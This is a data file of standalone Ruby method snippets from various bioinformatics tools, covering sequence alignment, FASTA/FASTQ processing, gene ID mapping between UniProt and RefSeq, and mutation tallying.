"def before_results(controller_params)\n @num_seqs = 0\n\n resfile = File.join(job_dir, jobid+\".aln\")\n raise(\"ERROR with resultfile!\") if !File.readable?(resfile) || !File.exists?(resfile) || File.zero?(resfile)\n res = IO.readlines(resfile).map {|line| line.chomp}\n\n # get the header\n @header = res.shift\n\n #get the alignment blocks\n @aln_blocks = []\n block = []\n num = 0\n res.each do |line|\n if (line =~ /^\\s*$/)\n if (!block.empty?)\n @aln_blocks.push(block)\n block = []\n if (@num_seqs == 0) then @num_seqs = num end\n num = 0\n end\n next\n end\n\n if (line !~ /^\\s+/) then num += 1 end\n block.push(line)\n end\n\n if (!block.empty?)\n @aln_blocks.push(block)\n end\n end",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def split_upids(idmap_file)\n puts \"split idmapping.dat to each prefix files\"\n up_refp_output = prepare_prefix_files(idmap_file, \"protein_id\")\n up_refg_output = prepare_prefix_files(idmap_file, \"gene_id\")\n\n cnt = 0\n # it is assumed that the tax_id is followed by a protein_id or gene_id\n current_tax = {upid: nil, tax_id: nil}\n taxid_missing_list = [] \n File.open(idmap_file, \"r\") do |f|\n f.each_line do |line|\n up, xref, id = line.strip.split(\"\\t\")\n case xref\n when \"NCBI_TaxID\"\n current_tax = {upid: up.split(\"-\").first, tax_id: id}\n when \"RefSeq\", \"GeneID\"\n # Push only the tax_id with refseq protein_id or gene_id\n if current_tax[:upid] == up.split(\"-\").first\n if xref == \"RefSeq\"\n prefix = id.chomp.strip[0..4]\n up_refp_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n elsif xref == \"GeneID\"\n prefix = id.chomp.strip[0]\n up_refg_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n end\n else\n taxid_missing_list.push(up)\n end\n end\n cnt += 1\n if (cnt % 100000 == 0)\n puts cnt\n end\n end\n # list of upid that can't get taxid. Depends on the order of idmapping.dat\n out = File.open(\"taxid_missing_list.json\", \"w\") unless taxid_missing_list.size == 0\n taxid_missing_list.each do |upid|\n out.puts JSON.pretty_generate(taxid_missing_list)\n end\n end\n\n # close files\n up_refp_output.each do |k, v|\n v.flush\n v.close\n end\n up_refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def align\n i = @max_cell_row\n j = @max_cell_column\n @first_result = \"\" \n @second_result = \"\" \n gaps_in_first = 0 # count of gaps in each sequence\n gaps_in_second = 0\n\n while true\n\n # end local alignment at 0 cell\n if @traceback_matrix[i, j] == 0\n break\n end\n\n # match/mismatch\n if @traceback_matrix[i, j] == 1\n @first_result << @first_string[i-1]\n @second_result << @second_string[j-1]\n i -= 1\n j -= 1\n end\n\n # deletion -> gap in S1\n if @traceback_matrix[i, j] == 2\n @first_result << \"-\"\n @second_result << @second_string[j-1]\n j -= 1\n gaps_in_first += 1\n end\n\n # insertion -> gap in S2\n if @traceback_matrix[i, j] == 3\n @first_result << @first_string[i-1]\n @second_result << \"-\"\n i -= 1\n gaps_in_second += 1\n end\n\n end\n # set variables to make writing to file prettier\n set_variables(gaps_in_first, gaps_in_second)\n end",
"def gen_random_seqs(msa_file,noalign_random_file)\n\n #read simple fasta file\n puts `pwd`\n\n\n len_align = 0;\n\n #create new OriginalAlignment\n oa = Bio::Alignment::OriginalAlignment.new()\n #load sequences from file\n Bio::FlatFile.open(Bio::FastaFormat, msa_file) { |ff|\n #store sequence from file\n ff.each_entry { |x| oa.add_seq(x.seq,x.entry_id) }\n }\n\n #remove gaps\n oa.remove_all_gaps!\n #determine ungaped length\n #oa.each_seq { |seq| len_align=[len_align,seq.length].max }\n #show it\n len_align = oa.alignment_length\n\n #store random sequence\n oa = oa.alignment_collect {|key| key = gen_rand_dna_seq(len_align) }\n\n #puts oa.output(:fasta)\n\n #puts result on disk\n simple_seqs_file = File.new(noalign_random_file,\"w\")\n simple_seqs_file.puts(oa.output_fasta)\n simple_seqs_file.close;\n \n end",
"def align_pairwise(bioseqs, opt={})\n factory = Bio::ClustalW.new\n clustal_opts = hash_opts_to_clustalopts(opt)\n factory.options = clustal_opts\n template = bioseqs.shift\n start_length = []\n pairwise_aligns = bioseqs.map do |bseq|\n clust_al = clustal_align([template, bseq], factory)\n cl_cons = clust_al.consensus\n aligned_string = clust_al[1].to_s\n #(st, len) = find_good_section(aligned_string, opt[:fidelity_length])\n seq_to_use = \n if opt[:consensus_fidelity]\n cl_cons\n else\n aligned_string\n end\n (st, len) = find_good_section(seq_to_use, opt[:fidelity_length])\n if st\n pristine = aligned_string[st, len].gsub('-','') # pristine read (ends removed)\n clustal_align([template.to_s, Bio::Sequence::NA.new(pristine)], factory)\n else\n warn \"a sequence does not meeting min fidelity! using original alignment\" \n clust_al\n end\n\n end\n end",
"def before_perform\n \n @basename = File.join(job.job_dir, job.jobid)\n @seqfile = @basename+\".in\"\n params_to_file(@seqfile, 'sequence_input', 'sequence_file')\n @commands = []\n @informat = params['informat'] ? params['informat'] : 'fas'\n reformat(@informat, \"fas\", @seqfile)\n @informat = \"fas\"\n\n @maxpsiblastit = params['maxpsiblastit']\n @maxhhblitsit = params['maxhhblitsit']\n @ss_scoring = \"-ssm \" + params[\"ss_scoring\"]\n @ptot = \"-T \" + params[\"ptot\"]\n @pself = \"-P \" + params[\"pself\"]\n @mergerounds = \"-mrgr \" + params[\"mergerounds\"]\n @mact = \"-mapt1 \" + params[\"mact\"] + \" -mapt2 \" + params[\"mact\"] + \" -mapt3 \" + params[\"mact\"]\n @domm = params[\"domm\"].nil? ? \"-domm 0\" : \"\" \n \n @maxlines = \"20\"\n @v = 1\n \n end",
"def process_input_seqs! fnames\n seq_lengths = {}\n clean_fnames = []\n\n fnames.each do |fname|\n clean_fname = fname + \"_aai_clean\"\n clean_fnames << clean_fname\n File.open(clean_fname, \"w\") do |f|\n Object::ParseFasta::SeqFile.open(fname).each_record do |rec|\n unless bad_seq? rec.seq\n header =\n annotate_header clean_header(rec.header),\n File.basename(fname)\n\n seq_lengths[header] = rec.seq.length\n\n f.puts \">#{header}\\n#{rec.seq}\"\n end\n end\n end\n end\n\n [seq_lengths, clean_fnames]\n end",
"def seqshash_to_fastafile(seqs,filename)\n oa = Bio::Alignment::OriginalAlignment.new(seqs)\n string_to_file(oa.output(:fasta),filename)\n\n end",
"def annotate_samples\n # hash to connect metadata\n exp_hash = create_metadata_hash(@exp_metadata, 0) # { expid => [metadata] }\n bs_hash = create_metadata_hash(@bs_metadata, 0) # { biosampleid => [metadata] }\n srs_hash = create_metadata_hash(@bs_metadata, 1) # { sampleid => [metadata] }\n date_hash = received_date_by_experiment # { expid => date_received }\n\n annotated = Parallel.map(open(@samples_fpath).readlines.drop(1), :in_threads => @@nop) do |line|\n data = line.chomp.split(\"\\t\")\n sample_md = bs_hash[data[0]] || srs_hash[data[0]]\n sample_info = if sample_md\n coverage = if sample_md[3] != \"NA\"\n data[7].to_f / sample_md[3].to_f * 1_000_000\n else\n \"NA\"\n end\n [\n sample_md,\n coverage,\n ]\n else\n \"NA\\tNA\\tNA\\tNA\" # secondary sample id, taxon id, taxonomic name, coverage\n end\n [\n data,\n sample_info,\n exp_hash[data[1]],\n date_hash[data[1]],\n ].flatten.join(\"\\t\")\n end\n open(output_fpath(\"quanto.annotated.tsv\"), 'w'){|f| f.puts([annotated_header.join(\"\\t\"), annotated]) }\n end",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts [\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def gags(options={})\n min_disagreeing_proportion = options[:min_disagreeing_proportion]\n min_disagreeing_proportion ||= 0.1\n min_disagreeing_absolute = options[:min_disagreeing_absolute]\n min_disagreeing_absolute ||= 3\n \n options[:acceptable_gag_errors] ||= DEFAULT_GAG_ERROR_CONTEXTS\n \n log = Bio::Log::LoggerPlus['bio-gag']\n \n piles = []\n gags = []\n \n each do |pile|\n options[:progressbar].inc unless options[:progressbar].nil?\n \n if piles.length < 2\n #log.debug \"Piles cache for this reference sequence less than length 2\"\n piles = [piles, pile].flatten\n next\n elsif piles.length < 3\n #log.debug \"Piles cache for this reference sequence becoming full\"\n piles = [piles, pile].flatten\n elsif piles[1].ref_name != pile.ref_name\n #log.debug \"Piles cache removed - moving to new contig\"\n piles = [pile]\n next\n else\n #log.debug \"Piles cache regular push through\"\n piles = [piles[1], piles[2], pile].flatten\n end\n log.debug \"Current piles now at #{piles[0].ref_name}, #{piles.collect{|pile| \"#{pile.pos}/#{pile.ref_base}\"}.join(', ')}\" if log.debug?\n \n # if not at the start/end of the contig\n first = piles[0]\n second = piles[1]\n third = piles[2]\n \n # Require particular sequences in the reference sequence\n ref_bases = \"#{first.ref_base.upcase}#{second.ref_base.upcase}#{third.ref_base.upcase}\"\n index = options[:acceptable_gag_errors].index(ref_bases)\n if index.nil?\n log.debug \"Sequence #{ref_bases} does not match whitelist, so not calling a gag\" if log.debug?\n next\n end\n gag_sequence = options[:acceptable_gag_errors][index]\n \n # all reads that have a single insertion after the first or second position, but not both \n inserting_reads = [first.reads, second.reads].flatten.uniq.select do |read|\n !(read.insertions[first.pos] and read.insertions[second.pos]) and\n (read.insertions[first.pos] or read.insertions[second.pos])\n end\n log.debug \"Inserting reads after filtering: #{inserting_reads.inspect}\" if log.debug?\n \n # ignore regions that aren't ever going to make it past the next filter\n if inserting_reads.length < min_disagreeing_absolute or inserting_reads.length.to_f/first.coverage < min_disagreeing_proportion\n log.debug \"Insufficient disagreement at step 1, so not calling a gag\" if log.debug?\n next\n end\n\n # what is the maximal base that is inserted and maximal number of directions\n direction_counts = {'+' => 0, '-' => 0}\n base_counts = {}\n inserting_reads.each do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n direction_counts[read.direction] += 1\n base_counts[insert] ||= 0\n base_counts[insert] += 1\n end\n log.debug \"Direction counts of insertions: #{direction_counts.inspect}\" if log.debug?\n log.debug \"Base counts of insertions: #{base_counts.inspect}\" if log.debug?\n max_direction = direction_counts['+']>direction_counts['-'] ? '+' : '-'\n max_base = base_counts.max do |a,b|\n a[1] <=> b[1]\n end[0]\n log.debug \"Picking max direction #{max_direction} and max base #{max_base}\" if log.debug?\n \n # Only accept positions that are inserting a single base\n if max_base.length > 1\n log.debug \"Maximal insertion is too long, so not calling a gag\" if log.debug?\n next\n end\n \n counted_inserts = inserting_reads.select do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n if read.direction == max_direction and insert == max_base\n # Remove reads that don't match the first and third bases like the consensus sequence\n read.sequence[read.sequence.length-1] == third.ref_base and\n read.sequence[read.sequence.length-3] == first.ref_base\n else\n false\n end\n end\n log.debug \"Reads counting after final filtering: #{counted_inserts.inspect}\" if log.debug?\n \n coverage = (first.coverage+second.coverage+third.coverage).to_f / 3.0\n coverage_percent = counted_inserts.length.to_f / coverage\n log.debug \"Final abundance calculations: max base #{max_base} (comparison base #{second.ref_base.upcase}) occurs #{counted_inserts.length} times compared to coverage #{coverage} (#{coverage_percent*10}%)\" if log.debug?\n if max_base != second.ref_base.upcase or # first and second bases must be the same \n counted_inserts.length < min_disagreeing_absolute or # require 3 bases in that maximal direction\n coverage_percent < min_disagreeing_proportion # at least 10% of reads with disagree with the consensus and agree with the gag\n log.debug \"Failed final abundance cutoffs, so not calling a gag\" if log.debug?\n next\n end\n \n # alright, gamut navigated. We have a match, record it\n gag = Bio::Gag.new(second.pos, piles, first.ref_name)\n gags.push gag\n log.debug \"Yielding gag #{gag.inspect}\"\n yield gag if block_given?\n end\n \n return gags\n end",
"def coverage\n if Experiment.find(params[:id]).uses_bam_file #return a pileup from samtools...\n\n else #return a position keyed hash of Positions objects\n features = Feature.find_in_range(params[:reference_id], params[:start], params[:end], params[:id])\n sequence = Reference.find(params[:reference_id]).sequence.sequence[params[:start].to_i - 1, (params[:end].to_i - params[:start].to_i)]\n positions = SimpleDepth.new(params[:start], params[:end], sequence, features)\n #comp_hash = {'A' => 'T', 'T' => 'A', 'G' => 'C', 'C' => 'G', 'N' => 'N'}\n #positions = Hash.new {|h,k| h[k] = {\n # '+' => {\n # 'A' => 0,\n # 'T' => 0,\n # 'G' => 0,\n # 'C' => 0,\n # 'N' => 0,\n # 'strand_total' => 0\n # },\n # '-' => {\n # 'A' => 0,\n # 'T' => 0,\n # 'G' => 0,\n # 'C' => 0,\n # 'N' => 0,\n # 'strand_total' => 0\n # },\n # 'position_total' => 0\n # }\n #}\n #positions['region_total'] = 0\n #positions['1'] = 1\n #features = Feature.find_in_range_no_overlap(params[:reference_id],params[:start],params[:end],params[:id])\n #features.each do |f|\n # if (f.sequence.match(/\\w/))\n # (f.start .. f.end - 1).each_with_index do |i, idx|\n # positions[i][f.strand][f.sequence[idx,1]] += 1\n # positions[i][f.strand]['strand_total'] += 1\n # positions[i]['position_total'] += 1\n # positions['region_total'] += 1\n # end\n # end\n end\n respond(positions)\n end",
"def getFtsProtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n if ftH.has_key? \"pseudo\"\n next\n end\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n pep = ftH[\"translation\"][0] if !ftH[\"translation\"].nil?\n pepBioSeq = Bio::Sequence.auto(pep)\n seqout = pepBioSeq.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def main\n \n cosmic = ARGV[0]\n\n genes = {}\n total = {}\n nonsense = {}\n missense = {}\n silent = {}\n frameshift = {}\n inframe = {}\n deletion = {}\n other = {}\n\n File.new(cosmic, \"r\").each do |line|\n cols = line.split(/\\t/)\n \n name, mut = cols[0], cols[15]\n if !genes.key?(name)\n genes[name] = cols[2]\n total[name] = 0\n nonsense[name] = 0\n missense[name] = 0\n silent[name] = 0\n frameshift[name] = 0\n inframe[name] = 0\n deletion[name] = 0\n other[name] = 0\n end\n\n if mut.match(\"Missense\")\n missense[name] += 1\n elsif mut.match(\"Nonsense\")\n nonsense[name] += 1\n elsif mut.match(\"silent\")\n silent[name] += 1\n elsif mut.match(\"Frameshift\") or mut.match(\"frameshift\")\n frameshift[name] += 1\n elsif mut.match(\"inframe\")\n inframe[name] += 1\n elsif mut.match(\"Whole gene deletion\")\n deletion[name] += 1\n else\n other[name] += 1\n end\n total[name] += 1\n\n end\n \n puts \"#gene\\tCDS_length\\ttotal\\tnonsense\\tmissense\\tsilent\\tframeshift\\tinframe\\tgene_deletion\\tother\"\n\n total.sort_by {|a , b| b}.reverse.each do |gene, t|\n puts \"#{gene}\\t#{genes[gene]}\\t#{t}\\t#{nonsense[gene]}\\t#{missense[gene]}\\t#{silent[gene]}\\t#{frameshift[gene]}\\t#{inframe[gene]}\\t#{deletion[gene]}\\t#{other[gene]}\"\n end\n\nend",
"def write\n\n # reverse alignments\n @first_result.reverse!\n @second_result.reverse!\n\n # Create middle section for matches/mismatches\n index = 0\n @first_result.length.times do\n if @first_result[index] == @second_result[index]\n @central_alignment << \"|\"\n else\n @central_alignment << \" \"\n end\n index += 1\n end\n\n offset = @start_first > @start_second ? @start_first.to_s.length : @start_second.to_s.length\n border = \"\"\n\n (offset+1).times do # lines up center with alignments\n border << \"=\"\n end\n\n # formats beginning and end of sequence output\n @first_result.insert(0, @start_first.to_s << \"=\")\n @first_result << \"=\" << @max_cell_row.to_s\n @second_result.insert(0, \"\" << @start_second.to_s << \"=\")\n @second_result << \"=\" << @max_cell_column.to_s\n @central_alignment.insert(0, border)\n @central_alignment << border\n\n # separate sequences and center into at most chunks of at most 60\n first_chunks = @first_result.scan(/.{1,60}/)\n central_chunks = @central_alignment.scan(/.{1,60}/)\n second_chunks = @second_result.scan(/.{1,60}/)\n\n length = first_chunks.length\n\n File.open(\"result.txt\", 'w') {|file| \n i = 0\n length.times do\n file.puts first_chunks[i]\n file.puts central_chunks[i]\n file.puts second_chunks[i]\n file.puts\n i += 1\n end\n }\n\n end",
"def alignment_strings(start=0,stop=self.length,organisms=nil) \n answer = Array.new \n self.genomic_aligns.each do |contig|\n if organisms.nil? # if no organisms were specified to limit the results\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name)) unless sequence.nil?\n else\n if organisms.include?(contig.find_organism)\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name))\n end\n end \n end\n return answer \n end",
"def mutations_effect(a_anno, a_gen)\n\n if $locus[a_anno[10]] && a_anno[3].length == a_anno[4].length\n $cdna.pos = $locus[a_anno[10]]\n transcript = original()\n exon_starts = a_gen[9].split(',')\n exon_ends = a_gen[10].split(',')\n mutation_position,exon_num = position_on_transcript(a_anno[1],a_gen[3],exon_starts,exon_ends,a_gen[6],a_gen[7])\n a_anno[12] = \"exon#{exon_num}\"\n start_triplet = (mutation_position/3 * 3) - 1\n if start_triplet >= 0\n code = transcript[start_triplet..start_triplet+2]\n pos_in_triplet = mutation_position%3\n original_aa = $codes[code]\n code[pos_in_triplet] = a_anno[4]\n mutated_aa = $codes[code[0..2]]\n if original_aa != mutated_aa\n a_anno[13] = pos_in_triplet + 1\n a_anno[14] = original_aa[:name]\n a_anno[15] = mutated_aa[:name]\n puts a_anno.join(\"\\t\")\n else\n a_anno[13] = \"same_AA\"\n STDERR.puts a_anno.join(\"\\t\")\n end\n end\n else\n if $locus_non_coding[a_anno[10]]\n a_anno[13] = \"ncrna\"\n STDERR.puts a_anno.join(\"\\t\")\n else\n if (a_anno[3].length > a_anno[4].length || a_anno[3].length < a_anno[4].length)\n a_anno[13] = \"indel\"\n puts a_anno.join(\"\\t\")\n else\n a_anno[13] = \"?\"\n STDERR.puts a_anno.join(\"\\t\")\n end\n end\n end\n\nend",
"def generate_fastq\n\n # Generate FASTQ file list, expanding patterns if found.\n fastq_input_file_list = []\n fastq_output_prefix_list = []\n fastq_output_group_list = []\n ARGV.each do |fastq_input_file|\n if fastq_input_file =~ /[\\+\\?\\*]/\n # File is regexp: use it to do our own \"glob\".\n # If the regexp has at least one group in it, save the group match\n # in a corresponding list to use in making the output files.\n fastq_input_dir = File.dirname(fastq_input_file)\n fastq_input_patt = File.basename(fastq_input_file)\n\n Dir.entries(fastq_input_dir).sort().each do |entry|\n if entry =~ /#{fastq_input_patt}()/o\n fastq_input_file_list << entry\n if not @out_prefix.nil?\n fastq_output_prefix_list << @out_prefix\n else\n fastq_output_prefix_list << entry[0..Regexp.last_match.begin(1)-1-1] # Second -1 is for underline.\n end\n fastq_output_group_list << $1\n end\n end\n else\n if File.file? fastq_input_file\n fastq_input_file_list << fastq_input_file\n fastq_output_prefix_list << @out_prefix\n end\n end\n end\n\n die \"no FASTQ files found\" if fastq_input_file_list.length == 0\n\n STDERR.puts(\"Input files: #{fastq_input_file_list}\") if @verbose\n\n fastq_list = fastq_input_file_list.zip(fastq_output_prefix_list, fastq_output_group_list)\n fastq_list.each do |fastq_input_file, fastq_output_prefix, fastq_output_group|\n\n # If we are splitting to subfiles, reset the output sub filenames to\n # the new destination for the new input file; also reset statistics.\n if @save_subfiles\n if fastq_output_group == \"\"\n fastq_output_group_mod = fastq_output_group\n else\n fastq_output_group_mod = \"_#{fastq_output_group}\"\n end\n @pass_sub_filename = File.join(@pass_dir, \"#{fastq_output_prefix}_pf#{fastq_output_group_mod}.fastq\")\n @pass_sub_filename += \".gz\" if @compress\n @reject_sub_filename = File.join(@reject_dir, \"#{fastq_output_prefix}_reject#{fastq_output_group_mod}.fastq\")\n @reject_sub_filename += \".gz\" if @compress\n\n @stats_sub_filename = File.join(@stats_dir, \"#{fastq_output_prefix}_seq_stats#{fastq_output_group_mod}.txt\")\n @pass_sub_read_cnt = @reject_sub_read_cnt = @total_sub_read_cnt = 0\n end\n\n if @save_subfiles\n open_fastq_sub_output_files\n end\n\n # split one FASTQ file into post-filter and reject FASTQ\n STDERR.puts \"Processing #{fastq_input_file}...\" if @verbose\n fastq_input_fp = open_fastq_input(fastq_input_file)\n if fastq_input_fp.nil?\n warn \"#{fastq_input_file} is empty...skipping\"\n next\n end\n begin\n while fastq_input_fp.readline\n header_line = $_\n if header_line !~ /^@/\n STDERR.puts \"Missing header line (#{header_line})...exiting\"\n exit(-1)\n end\n\n header_fields = header_line.split(/[ _]/)\n die \"header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\"!\")}]\" if header_fields.size != 2\n\n sub_header_fields = header_fields[1].split(\":\",-1)\n die \"sub header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\":\")}(#{sub_header_fields.join(\":\")})]\" if sub_header_fields.size != 4\n\n @total_read_cnt += 1\n @total_sub_read_cnt += 1\n\n if sub_header_fields[1] == \"N\"\n out = @pass\n @pass_read_cnt += 1\n out_sub = @pass_sub\n @pass_sub_read_cnt += 1\n elsif sub_header_fields[1] == \"Y\"\n out = @reject\n @reject_read_cnt += 1\n out_sub = @reject_sub\n @reject_sub_read_cnt += 1\n else\n die \"filter field value error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER}...skipping read\"\n out = nil\n end\n\n # Read the rest of the sequence.\n seq_line = fastq_input_fp.readline\n plus_line = fastq_input_fp.readline\n if plus_line !~ /^\\+/\n STDERR.puts \"Malformed FASTQ +line (#{plus_line})\"\n end\n qual_line = fastq_input_fp.readline\n\n # Output the sequence to whatever file was chosen above.\n if !out.nil?\n if not @remove_spaces\n out.print \"#{header_line}\"\n out_sub.print \"#{header_line}\" if not out_sub.nil?\n else\n out.puts header_fields.join(\"_\")\n out_sub.puts header_fields.join(\"_\") if not out_sub.nil?\n end\n out.print \"#{seq_line}\"\n out.print \"#{plus_line}\"\n out.print \"#{qual_line}\"\n if not out_sub.nil?\n out_sub.print \"#{seq_line}\"\n out_sub.print \"#{plus_line}\"\n out_sub.print \"#{qual_line}\"\n end\n end\n end # while\n\n rescue EOFError\n\n end\n\n fastq_input_fp.close()\n\n if @save_subfiles\n close_fastq_sub_output_files\n store_stats @stats_sub_filename, @pass_sub_read_cnt, @reject_sub_read_cnt, @total_sub_read_cnt\n end\n\n end # fastq_list.each\n end",
"def test_alignment_works_in_single_thread\n assert_nothing_raised(\"Can't handle single threaded scenario\") do\n SEQUENCE_GROUPS[0..10].each do |sequence_group|\n align_group(sequence_group)\n end\n end\n end",
"def merge_reads\n @reads_fpath = output_fpath(\"quanto.reads.tsv\")\n if !output_exist?(@reads_fpath)\n File.open(@reads_fpath, 'w') do |file|\n file.puts(reads_header.join(\"\\t\"))\n @objects.each do |obj|\n file.puts(open(obj[:summary_path]).read.chomp)\n end\n end\n end\n end",
"def generate_pid_fasta_file(dir=\"temp_data\")\n fasta_string=\"\"\n seq = Sequence.get(self.seq_id)\n pids = PercentIdentity.all(:seq1_id => self.seq_id, :percent_id.gte => 20, :order =>[:percent_id.desc],:unique=>true)\n fasta_string= Alignment.first(:alignment_name => self.alignment_name, :seq_id=>self.seq_id).fasta_alignment_string\n puts seq.abrev_name+\":\"+pids.count.to_s\n puts pids.map{|p| p.seq2_sequence.seq_name}.join(',')\n pids.each do |pid|\n if pid.seq2_id != seq.seq_id\n print Sequence.get(pid.seq2_id).abrev_name + \":\" + pid.percent_id.to_s + \",\"\n fasta_string = fasta_string + Alignment.first(:alignment_name=>pid.alignment_name, :seq_id=>pid.seq2_id).fasta_alignment_string(\"pid:#{pid.percent_id}\")\n end\n end\n puts \"\"\n filepath = \"#{dir}/\"+self.alignment_name+\"_\"+seq.abrev_name+\"_pid.fasta\"\n f = File.new(filepath, \"w+\")\n f.write(fasta_string)\n f.close\n filepath\n end",
